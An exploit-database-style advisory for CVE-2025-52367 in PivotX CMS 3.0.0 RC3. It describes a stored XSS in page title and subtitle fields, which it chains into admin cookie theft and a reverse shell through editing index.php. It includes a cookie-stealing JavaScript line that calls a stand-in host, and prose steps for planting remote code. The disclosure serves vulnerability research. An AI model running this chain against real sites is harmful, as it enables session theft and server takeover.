# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367
## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
Note: If you are already admin, skip steps 1-7
## Exploitation Steps:
1. Login as an authenticated user (normal user, no need for admin).
2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page
3. Create locally a JavaScript file contaning cookie stealing code.
For example: lol.js
Containing:
document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;
4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):
5. Publish the page.
6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.
7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.
8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file
9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.
10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)
# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3